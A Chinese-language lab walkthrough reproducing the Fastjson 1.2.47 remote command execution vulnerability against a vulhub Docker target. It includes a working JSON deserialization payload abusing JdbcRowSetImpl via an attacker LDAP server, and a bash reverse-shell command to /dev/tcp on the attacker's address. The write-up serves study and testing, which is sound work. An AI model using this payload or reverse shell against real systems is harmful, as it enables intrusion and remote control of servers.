复现Fastjson 1.2.47 远程命令执行漏洞

复现Fastjson 1.2.47 远程命令执行漏洞

漏洞原理：
Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越，被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。

攻击机：window 10 IP地址192.168.32.1
靶机：ubantu 16.04 IP地址192.168.32.142

攻击步骤：
（1）开启Fastjson 1.2.47靶场环境
在vulhub靶场中找到vulhub/fastjson/1.2.47-rce
执行命令：docker-compose up -d

（2）下载fastjson_rce_tool
地址：https://github.com/wyzxxz/fastjson_rce_tool下载jar
（3）在cmd中执行java -cp fastjson_tool.jar fastjson.HLDAPServer 192.168.32.1 80 "bash=/bin/bash -i >& /dev/tcp/192.168.32.1/888 0>&1"

（4）开启监听端口888

（5）访问靶场http://192.168.32.142:8090/，使用bp抓包，将数据包发送到repeater

修改GET 为POST，发送payload，注意校验json

{
	"a": {
		"@type": "java.lang.Class",
		"val": "com.sun.rowset.JdbcRowSetImpl"
	},
	"b": {
		"@type": "com.sun.rowset.JdbcRowSetImpl",
		"dataSourceName": "ldap://192.168.32.1:80/Object",
		"autoCommit": true
	}
}

（6）反弹shell
在fast_rce_tool中返回信息

成功反弹shell